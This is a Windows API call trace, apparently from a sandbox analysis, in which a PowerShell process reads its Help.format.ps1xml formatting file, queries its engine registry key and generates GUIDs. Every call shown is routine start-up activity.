	[0755.061] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe2570709, Data2=0x90dd, Data3=0x4b6d, Data4=([0]=0xbc, [1]=0xf2, [2]=0x7a, [3]=0xbd, [4]=0xc5, [5]=0xd4, [6]=0xf0, [7]=0x1d))) returned 0x0
	[0755.061] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x198
	[0755.062] GetFileType (hFile=0x198) returned 0x1
	[0755.062] SetErrorMode (uMode=0x1) returned 0x1
	[0755.062] GetFileType (hFile=0x198) returned 0x1
	[0755.062] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.062] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.062] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.062] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.063] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.063] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.063] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.063] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.065] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.066] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.066] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.066] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.067] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.067] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.067] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.068] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.071] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.071] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.072] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.072] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.072] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.073] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.073] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.073] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.074] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.074] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.074] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.075] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.075] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.075] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.076] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.076] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.082] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.083] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.083] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.083] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.084] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.084] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.084] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.085] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.085] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.085] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.086] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.086] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.086] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.087] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.087] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.088] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.088] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.088] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.089] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.089] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.089] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.090] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.090] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.091] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.091] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.091] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.092] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.092] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0755.092] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0756.538] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0756.539] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0xf37, lpOverlapped=0x0) returned 1
	[0756.539] ReadFile (in: hFile=0x198, lpBuffer=0x333e127, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333e127*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0756.539] ReadFile (in: hFile=0x198, lpBuffer=0x333ea88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x333ea88*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0756.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0756.539] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0756.540] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0756.540] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0756.540] CoTaskMemFree (pv=0x286c4e0) 
	[0756.540] RegCloseKey (hKey=0x198) returned 0x0
	[0756.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.544] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2988b853, Data2=0x437e, Data3=0x46a9, Data4=([0]=0x83, [1]=0x6c, [2]=0xba, [3]=0x1d, [4]=0x94, [5]=0x18, [6]=0x45, [7]=0xf3))) returned 0x0
	[0756.545] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x4a7c0d9e, Data2=0x20df, Data3=0x49fd, Data4=([0]=0x92, [1]=0xd2, [2]=0xb2, [3]=0xf5, [4]=0x51, [5]=0x25, [6]=0x68, [7]=0x7c))) returned 0x0
	[0756.553] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xb73b17d5, Data2=0x550d, Data3=0x4a52, Data4=([0]=0xa5, [1]=0x8c, [2]=0xed, [3]=0x46, [4]=0x4c, [5]=0xc9, [6]=0xb7, [7]=0x10))) returned 0x0
	[0756.557] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc2e732b7, Data2=0x1996, Data3=0x4600, Data4=([0]=0xbb, [1]=0x7b, [2]=0xfa, [3]=0x1c, [4]=0xfa, [5]=0xbb, [6]=0xef, [7]=0xc3))) returned 0x0
	[0758.041] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x5fc8a04c, Data2=0xb6b6, Data3=0x4ee2, Data4=([0]=0x9e, [1]=0x5e, [2]=0x7f, [3]=0x14, [4]=0x2f, [5]=0xdc, [6]=0xd9, [7]=0x6e))) returned 0x0
	[0758.041] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x63524f4, Data2=0xe121, Data3=0x4c4f, Data4=([0]=0xab, [1]=0xc8, [2]=0xd3, [3]=0xd0, [4]=0x3c, [5]=0xb0, [6]=0xee, [7]=0x63))) returned 0x0
	[0758.044] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xbf39c3be, Data2=0xe2be, Data3=0x4163, Data4=([0]=0x80, [1]=0x6f, [2]=0x1e, [3]=0x78, [4]=0xd5, [5]=0x4f, [6]=0x2a, [7]=0x73))) returned 0x0
	[0758.044] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x9c3a8644, Data2=0x6a83, Data3=0x4cc8, Data4=([0]=0x99, [1]=0xf0, [2]=0xe, [3]=0x65, [4]=0xd0, [5]=0xe3, [6]=0xda, [7]=0x16))) returned 0x0
	[0758.045] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x4a069fe6, Data2=0xe37a, Data3=0x4fb1, Data4=([0]=0xb5, [1]=0x98, [2]=0xc0, [3]=0xe4, [4]=0x12, [5]=0xb9, [6]=0x81, [7]=0x9b))) returned 0x0
	[0758.045] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x341ec1e8, Data2=0x5215, Data3=0x43ef, Data4=([0]=0x9b, [1]=0xa8, [2]=0x0, [3]=0xb5, [4]=0xd, [5]=0xce, [6]=0xe8, [7]=0x35))) returned 0x0
	[0758.045] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x571f0a0b, Data2=0xdb49, Data3=0x441b, Data4=([0]=0xb3, [1]=0xb4, [2]=0xc5, [3]=0xbc, [4]=0x97, [5]=0x6f, [6]=0xe4, [7]=0x20))) returned 0x0
	[0758.045] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc21618ca, Data2=0x1844, Data3=0x4b98, Data4=([0]=0xb1, [1]=0xe8, [2]=0xce, [3]=0xe8, [4]=0x10, [5]=0x8f, [6]=0x5c, [7]=0xa8))) returned 0x0
	[0758.045] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x293b71ae, Data2=0xf45a, Data3=0x4371, Data4=([0]=0xbd, [1]=0x1a, [2]=0x20, [3]=0x1c, [4]=0xc2, [5]=0x80, [6]=0x32, [7]=0x2d))) returned 0x0
	[0758.046] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x343de226, Data2=0xdbf9, Data3=0x498e, Data4=([0]=0xb7, [1]=0xe, [2]=0x60, [3]=0x67, [4]=0xd7, [5]=0x41, [6]=0x4b, [7]=0x42))) returned 0x0
	[0758.046] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xfd356942, Data2=0xe50e, Data3=0x4005, Data4=([0]=0xbc, [1]=0x7b, [2]=0xb3, [3]=0xbb, [4]=0x56, [5]=0x6f, [6]=0x63, [7]=0x20))) returned 0x0
	[0758.047] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xe3614132, Data2=0xce3e, Data3=0x4054, Data4=([0]=0x90, [1]=0xb6, [2]=0x81, [3]=0x0, [4]=0xdf, [5]=0xb0, [6]=0x4e, [7]=0xdd))) returned 0x0
	[0758.056] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xfd90b77c, Data2=0x2915, Data3=0x4fe7, Data4=([0]=0xab, [1]=0x67, [2]=0xe2, [3]=0x3d, [4]=0x95, [5]=0x22, [6]=0xab, [7]=0x19))) returned 0x0
	[0758.057] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xda042e5, Data2=0xd7f2, Data3=0x441e, Data4=([0]=0xa4, [1]=0x97, [2]=0xe7, [3]=0xad, [4]=0x21, [5]=0x2d, [6]=0xea, [7]=0xba))) returned 0x0
	[0758.057] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xd88eba6f, Data2=0x43ad, Data3=0x43b3, Data4=([0]=0x81, [1]=0xbf, [2]=0xfa, [3]=0x48, [4]=0x1a, [5]=0x5a, [6]=0x26, [7]=0xab))) returned 0x0
	[0758.057] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x53128924, Data2=0xfc1f, Data3=0x4d6f, Data4=([0]=0xad, [1]=0x8a, [2]=0x28, [3]=0x49, [4]=0xe2, [5]=0x69, [6]=0x1e, [7]=0xbc))) returned 0x0
	[0758.057] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x255fb79f, Data2=0xb6cd, Data3=0x49e0, Data4=([0]=0xa9, [1]=0x1b, [2]=0xd, [3]=0xf0, [4]=0x68, [5]=0x62, [6]=0x20, [7]=0xfc))) returned 0x0
	[0758.058] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x8e1cbfd, Data2=0x3c17, Data3=0x494a, Data4=([0]=0xb2, [1]=0x86, [2]=0x5, [3]=0xe2, [4]=0xa2, [5]=0x2a, [6]=0xf4, [7]=0x5))) returned 0x0
	[0758.058] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x2ee6bdf6, Data2=0xcb51, Data3=0x47a5, Data4=([0]=0xbc, [1]=0xe1, [2]=0xd9, [3]=0x6e, [4]=0xeb, [5]=0x8c, [6]=0xb4, [7]=0x79))) returned 0x0
	[0758.058] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xafceb29e, Data2=0x59ef, Data3=0x47b8, Data4=([0]=0x97, [1]=0x9, [2]=0x7c, [3]=0x5e, [4]=0x6e, [5]=0xdc, [6]=0x92, [7]=0xa1))) returned 0x0
	[0758.058] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0xc8cbb7fd, Data2=0x2c8e, Data3=0x4a03, Data4=([0]=0x98, [1]=0x3, [2]=0x18, [3]=0x76, [4]=0x96, [5]=0x85, [6]=0xf7, [7]=0x31))) returned 0x0
